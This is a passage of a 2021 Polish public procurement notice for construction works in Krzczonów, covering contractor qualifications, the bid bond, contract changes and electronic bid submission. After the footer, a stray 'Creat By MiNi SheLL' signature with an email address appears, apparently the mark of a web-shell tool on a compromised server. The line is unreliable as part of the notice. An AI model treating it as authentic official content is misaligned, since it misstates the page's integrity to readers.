przedmiotem<br/>zamówienia lubodpowiadające im równoważne uprawnienia budowlane wydane na podstawie<br/>wcześniejobowiązujących przepisów, a w przypadku Wykonawców zagranicznych –<br/>uprawnieniabudowlane do kierowania robotami równoważne do wyżej wskazanych.i) min. jedną<br/>osobąposiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalnościinstalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych,<br/>którychzakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia<br/>lubodpowiadające im równoważne uprawnienia budowlane wydane na podstawie<br/>wcześniejobowiązujących przepisów, a w przypadku Wykonawców zagranicznych –<br/>uprawnieniabudowlane do kierowania robotami równoważne do wyżej wskazanych,<br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:1)<br/>Wykonawcapowinien w wykazie robót wyraźnie określić zakres robót, aby można było ustalić,<br/>czy spełniawarunek udziału w postępowaniu.2) Wartości podane w dokumentach w walutach<br/>innych niżwskazane przez Zamawiającego będą przeliczane wg średniego kursu NBP na dzień<br/>publikacjiogłoszenia.3) Przez posiadanie uprawnień budowlanych wymaganych prawem dla<br/>osóbuczestniczących w realizacji zamówienia, rozumie się uprawnienia do<br/>wykonywaniasamodzielnych funkcji w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca<br/>1994 r.Prawo budowlane (t. j. Dz. U. 2020 r, poz. 1333 z późn. zm.) oraz przepisów<br/>wcześniejszych.Samodzielne funkcje techniczne w budownictwie (nazwy specjalności i ich<br/>zakresy) będąrozpatrywane zgodnie z przepisami regulującymi nadawanie uprawnień<br/>budowlanych w dacieich nadania.4) Wykonawca w celu wykazania spełniania warunków<br/>określonych w pkt 6.1.4, ppkt2) SWZ może wskazać osobę będącą obywatelem państwa<br/>członkowskiego UE, która nabyłakwalifikacje zawodowe do wykonywania działalności w<br/>budownictwie, równoznacznewykonywaniu samodzielnych funkcji technicznych w budownictwie<br/>na terytoriumRzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z<br/>ustawą z dnia22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwachczłonkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia 15<br/>grudnia2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z<br/>2019 r.poz. 1117).5) Zamawiający dopuszcza wykazanie tej samej osoby do projektowania<br/>lubkierowania robotami w wielu branżach pod warunkiem posiadania stosownych uprawnień. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.2. W przypadku, o którym mowa w rozdziale 6.3 SWZ<br/>Wykonawcywspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika,które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. 8.2.1.<br/>Oświadczenienależyzłożyć wg wymogów załącznika nr 6 do SWZ. 8.2.2. Oświadczenie to jest<br/>podmiotowymśrodkiem dowodowym. 8.3.1. W celu potwierdzenia spełniania warunków udziału<br/>wpostępowaniu: a)wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat<br/>przed terminemskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie,<br/>wraz z podaniemich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostaływykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem<br/>dowodówokreślających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o którychmowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>robotybudowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>wstanieuzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku<br/>określonego wpkt. 6.1.4. ppkt. 1) SWZ,b) wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówieniapublicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanierobotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresuwykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobamisporządzonego zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku<br/>określonego w pkt.6.1.4. ppkt. 2) SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 6 000, 00 PLN (słownie zł:<br/>sześć tysięcy zł 00/100),12.2. Wadium może być wniesione w jednej lub kilku<br/>następującychformach:a) pieniądzu;b) gwarancjach bankowych;c) gwarancjach<br/>ubezpieczeniowych;d)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt. 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości.12.3. Wadiumwnoszone w pieniądzu należy wpłacić przelewem na<br/>następujący rachunek bankowyZamawiającego:RBS Bychawa/O Krzczonównr rachunku: 74<br/>8685 0001 0011 4185 2000 0030zadnotacją „Wadium – Znak sprawy:<br/>RBD.271.4.2021.MR”12.4. Za skuteczne wniesienie wadiumw pieniądzu, Zamawiający uzna<br/>wadium, które zostanie zaksięgowane na rachunku bankowymZamawiającego przed upływem<br/>terminu składania ofert. 12.5. Jeżeli wadium jest wnoszone wformie gwarancji lub poręczenia<br/>Wykonawca przekazuje zamawiającemu oryginał gwarancji lubporęczenia, w postaci<br/>elektronicznej – przed upływem terminu składania ofert.12.6. Wprzypadku wnoszenia wadium w<br/>formie gwarancji bankowej lub ubezpieczeniowej, lubporęczenia gwarancja lub poręczenie musi<br/>być nieodwołalne, bezwarunkowe i płatne napierwsze pisemne żądanie Zamawiającego,<br/>sporządzone zgodnie z obowiązującymi przepisami ipowinna zawierać następujące elementy:a)<br/>nazwę: dającego zlecenie (Wykonawcy),beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta lub poręczyciela oraz wskazanieich siedzib,b) kwotę wadium,c) termin ważności<br/>gwarancji/poręczenia w formule: „od dnia …….–do dnia ………”,d) zobowiązanie<br/>gwaranta/poręczyciela do zapłacenia kwoty wskazanej wgwarancji/poręczeniu na pierwsze<br/>żądanie Zamawiającego w sytuacjach zatrzymania wadiumokreślonych w przepisach ustawy.<br/>12.7. Wadium wnosi się przed upływem terminu składaniaofert i utrzymuje nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiemprzypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.12.8. Zasadydokonywania zatrzymania i zwrotu wadium<br/>określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku,Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzieleniezamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówieniapublicznego.10.2. W przypadku Wykonawców wspólnie ubiegających się o<br/>udzieleniezamówienia:a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>zWykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brakpodstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów<br/>selekcji wzakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniulub kryteriów selekcji.b) w przypadku, o którym mowa w rozdziale 6.3 SWZ<br/>Wykonawcy wspólnieubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika,które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy. Oświadczenienależy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie<br/>to jest podmiotowymśrodkiem dowodowym.c) zobowiązani są oni na wezwanie Zamawiającego,<br/>złożyć podmiotoweśrodki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe<br/>środki dowodowe, októrych mowa w pkt. 8.3.1 SWZ składa odpowiednio<br/>Wykonawca/Wykonawcy, który/którzywykazuje/-ą spełnienie warunku. 10.3. Jeżeli została<br/>wybrana oferta Wykonawców wspólnieubiegających się o udzielenie zamówienia, Zamawiający<br/>może żądać przed zawarciem umowyw sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień<br/>publicznych,strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści<br/>oferty, napodstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia<br/>którejkolwiek znastępujących okoliczności:1) przedłużenie terminu realizacji zamówienia, o<br/>którym mowa w § 2ust. 1, może nastąpić w przypadku wystąpienia okoliczności siły wyższej,<br/>przez którą należyrozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe<br/>do zapobieżenia,które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty<br/>terroryzmu, klęskiżywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym<br/>przedłużenie terminurealizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi<br/>występowania okolicznościsiły wyższej,2) przedłużenie terminu realizacji zamówienia, o którym<br/>mowa w § 2 ust. 1, możenastąpić w przypadku skierowania przez Zamawiającego do<br/>Wykonawcy pisemnego żądaniawstrzymania robót budowlanych, stanowiących przedmiot<br/>zamówienia lub wydania zakazuprowadzenia robót budowlanych, stanowiących przedmiot<br/>zamówienia przez organ administracjipublicznej lub eksploatorów infrastruktury, o ile żądanie lub<br/>wydanie zakazu nie nastąpiło zprzyczyn, za które Wykonawca ponosi odpowiedzialność, przy<br/>czym przedłużenie terminurealizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi<br/>na jaki Wykonawcynakazano wstrzymanie robót budowlanych lub zakazano prowadzenie robót<br/>budowlanych3)przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może<br/>nastąpić wprzypadku wystąpienia kolizji z instalacjami wewnętrznymi nieujawnionymi w<br/>dokumentacjiprojektowej, lub innymi robotami prowadzonymi przez innego wykonawcę, przy<br/>czymprzedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy<br/>nausunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub<br/>oliczbę dni niezbędnych do wykonania robót przez innego wykonawcę – o ile usunięcie<br/>kolizjiwymagać będzie przedłużenia terminu realizacji;4) przedłużenie terminu realizacji<br/>zamówienia, októrym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia konieczności<br/>wprowadzeniaw dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie<br/>robótbudowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu<br/>realizacjizamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji<br/>projektowejoraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami, uzyskania<br/>opiniiwłaściwych organów oraz wydania decyzji przez właściwe organy, przy czym wprowadzenie wdokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą)<br/>zakresuświadczenia Wykonawcy zawartego w ofercie, stanowiącej załącznik nr 3 do umowy<br/>orazzwiększeniem wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 1, 5) przedłużenie<br/>terminurealizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku<br/>wystąpieniawarunków geologicznych lub hydrologicznych odmiennych od założonych w<br/>dokumentacjiprojektowej i powodujących konieczność wstrzymania robót lub konieczność ich<br/>wykonania przywykorzystaniu odmiennych od zaprojektowanych rozwiązań technicznych, przy<br/>czymprzedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do<br/>wyeliminowaniautrudnień związanych z ich wystąpieniem, 6) przedłużenia terminu wykonania<br/>zamówienia wzakresie niezbędnym do wykonania robót zleconych na podstawie art. 455 ust. 1<br/>pkt 1, 3, 4 lubust. 2 ustawy Prawo zamówień publicznych,7) zmiany powszechnie<br/>obowiązujących przepisówprawa w zakresie mającym bezpośredni wpływ na realizację<br/>przedmiotu zamówienia lubświadczenia stron umowy,Pozostałe warunki znajdują się w §18<br/>Projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">14.1. Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-17 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Kontynuacja sekcji 3.6: W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki<br/>ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem. 11.9.<br/>Ofertę należy sporządzić w języku polskim. 11.10. Ofertę składa się, pod rygorem nieważności,<br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. 11.11. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został<br/>w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl 11.12. Jeżeli<br/>dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej,<br/>zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z<br/>dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913),<br/>wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i<br/>odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia „Załącznik<br/>stanowiący tajemnicę przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi jawną część<br/>należy ten plik zaszyfrować. 11.13. Do oferty należy dołączyć oświadczenie o niepodleganiu<br/>wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w pkt 8.1<br/>SWZ, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.11.14. Oferta<br/>może być złożona tylko do upływu terminu składania ofert. 11.15. Wykonawca może przed<br/>upływem terminu do składania ofert wycofać ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Sposób wycofania oferty został opisany w „Instrukcji użytkownika” dostępnej na<br/>miniPortalu.11.16. Wykonawca po upływie terminu do składania ofert nie może skutecznie<br/>dokonać zmiany ani wycofać złożonej oferty. Składanie dokumentów innych niż oferty.11.17. W<br/>postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami<br/>w zakresie składania dokumentów, oświadczeń, wniosków (innych niż ofert, które mogą być<br/>przekazywane jedynie w sposób wskazany w pkt 11.8 SWZ) odbywa się elektronicznie za<br/>pośrednictwem:a) dedykowanego formularza: „Formularz do komunikacji” dostępnego na<br/>ePUAP oraz udostępnionego przez miniPortal;b) poczty elektronicznej na adres poczty<br/>Zamawiającego: sekretariat@krzczonow.mbnet.plZamawiający przekazuje dokumenty na adres<br/>poczty elektronicznej wskazany w formularzu ofertowym Wykonawcy, na co Wykonawca wyraża<br/>zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez<br/>czas trwania postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski<br/>przekazane na adres poczty elektronicznej wskazany w formularzu ofertowym zostały doręczone<br/>skutecznie, a Wykonawca zapoznał się z ich treścią.11.18. W przypadku korzystania z<br/>rozwiązania wskazanego w rozdziale 11.17 lit a) SWZ dokumenty elektroniczne, składane są<br/>przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. 11.19.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą<br/>poczty elektronicznej, na wskazany w rozdziale 11.17 lit b) SWZ adres poczty<br/>elektronicznej.11.20. Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-26 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com